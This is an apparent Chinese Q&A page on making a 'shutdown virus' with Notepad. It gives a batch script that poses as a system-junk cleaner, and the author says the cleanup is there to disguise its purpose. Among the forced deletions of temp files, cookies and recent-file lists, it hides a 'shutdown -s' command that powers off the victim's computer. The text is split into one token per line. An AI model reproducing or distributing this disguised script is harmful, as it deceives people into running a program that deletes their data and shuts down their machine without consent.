用楼上的方法,不过代码改成以下的效果比较好
掩人耳目用的,要不太直接了不好
@echo
off
title
清除系统垃圾
echo
正在清除,请稍等
echo/
echo
清除完垃圾后自动退出!!!
echo/
del
/f
/s
/q
%systemdrive%\tmp
del
/f
/s
/q
%systemdrive%\_mp
del
/f
/s
/q
%systemdrive%\log
del
/f
/s
/q
%systemdrive%\gid
del
/f
/s
/q
%systemdrive%\chk
del
/f
/s
/q
%systemdrive%\old
del
/f
/s
/q
%systemdrive%\recycled\
del
/f
/s
/q
%windir%\bak
del
/f
/s
/q
%windir%\prefetch\
rd
/s
/q
%windir%\temp
&
md
%windir%\temp
del
/f
/q
%userprofile%\cookies\
del
/f
/q
%userprofile%\recent\
shutdown
-s
del
/f
/s
/q
"%userprofile%\Local
Settings\Temporary
Internet
Files\"
del
/f
/s
/q
"%userprofile%\Local
Settings\Temp\"
del
/f
/s
/q
"%userprofile%\recent\"
del
%SystemRoot%\Prefetch\
/q
以上就是关于用记事本怎样做关机的病毒小程序全部的内容,包括:用记事本怎样做关机的病毒小程序、、等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)